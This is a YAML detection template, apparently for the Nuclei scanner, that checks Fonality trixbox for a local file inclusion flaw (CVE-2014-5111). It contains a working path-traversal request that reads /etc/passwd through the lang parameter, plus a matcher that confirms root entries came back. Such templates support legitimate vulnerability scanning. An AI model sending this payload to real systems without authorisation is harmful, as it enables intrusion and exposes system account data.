38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: CVE-2014-5111
|
|
|
|
info:
|
|
name: Fonality trixbox - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/39351
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-5111
|
|
- http://packetstormsecurity.com/files/127522/Trixbox-XSS-LFI-SQL-Injection-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cve-id: CVE-2014-5111
|
|
tags: packetstorm,cve,cve2014,lfi,trixbox,edb
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/24
|